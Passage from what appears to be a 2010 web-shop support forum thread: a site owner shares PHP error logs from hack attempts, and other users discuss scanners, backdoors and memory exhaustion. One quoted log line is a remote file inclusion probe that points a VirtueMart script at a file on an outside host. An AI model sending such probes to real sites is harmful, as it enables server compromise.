Site Hacked - again!!!

Does anyone has the solution to the hack attempts? My site has these in error log.

```php

[26-Feb-2010 15:20:02] PHP Warning: parse_url(/?sef_rewrite=1//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.cienciacompartida.org////id1.txt???) [function.parse-url]: Unable to parse URL in /path/public_html/addons/seo/func.php on line 702

[26-Feb-2010 15:20:02] PHP Warning: Cannot modify header information - headers already sent by (output started at /path/public_html/addons/seo/func.php:702) in /path/public_html/core/fn.init.php on line 400

[26-Feb-2010 12:20:02] PHP Warning: Cannot modify header information - headers already sent by (output started at /path/public_html/addons/seo/func.php:702) in /path/public_html/core/fn.control.php on line 455

```

Ignore them, typical kiddyscript scanner.

however, it causes my website to run out of memory. how to resolve?

I don’t see how it can run out of memory on scripts that finish executing midway because of a fatal error…



Plus, if your website was hacked and you did not reinstall everything fresh, they probably left themselves a backdoor and they visit often… a possibility.



Also, if you have a misconfiguration, it also may lead to attacks, successful attacks. Or, you may jump to panic over nothing.



Do this, hire a person who knows what he is doing, let him/her look over. Sure it is not a free help but “the one that works.” …if not for your customers then for your own mental health, stop losing sleep over something you have no potential control, let a professional do it.

I think it’s the other way around. The fatal error is caused by the script using up all the memory midway through executing.



I just had one of those today:

[14-Apr-2010 10:32:33] PHP Fatal error: Allowed memory size of 50331648 bytes exhausted (tried to allocate 4381268 bytes) in /public_html/var/compiled/admin/%%72^72D^72DAF6E8%%main.tpl.php on line 23



At 10:32 I think I opened main.tpl.php on the ftp, I just looked at it though, maybe someone tried to view the admin at the exact same time and there was an access error? First time so I’m just ignoring it.

Errors like this are caused mostly by run-away loops or working with oversized images.



Your script consumed over 50Megs, it has nothing to do with concurrent execution.